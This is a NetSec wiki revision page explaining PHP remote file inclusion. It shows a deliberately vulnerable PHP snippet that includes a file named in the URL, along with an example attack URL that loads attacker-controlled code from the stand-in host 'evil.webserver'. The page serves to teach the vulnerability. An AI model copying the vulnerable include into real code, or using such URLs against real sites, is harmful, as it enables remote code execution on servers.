Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "File Inclusion/Remote File Inclusion"
From NetSec
Chantal21I (Talk | contribs) (Created page with "Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion u...") |
Chantal21I (Talk | contribs) |
||
| Line 33: | Line 33: | ||
<br> | <br> | ||
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side. | In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side. | ||
| − | |||
| − | |||
Latest revision as of 06:55, 19 July 2012
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.
The example URI of a vulnerable site will be /include.php?file=howto.php
PHP for this may look like:
<HTML> <TITLE>Page Title</TITLE> <BODY> <?php include($_GET['file']); ?>
</BODY></HTML>
|
|
The above PHP code is vulnerable. Do not use this on your site! |
An attacker that sees
/include.php?file=howto.php
may change the URL to
/include.php?file=http://evil.webserver/include.txt
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.
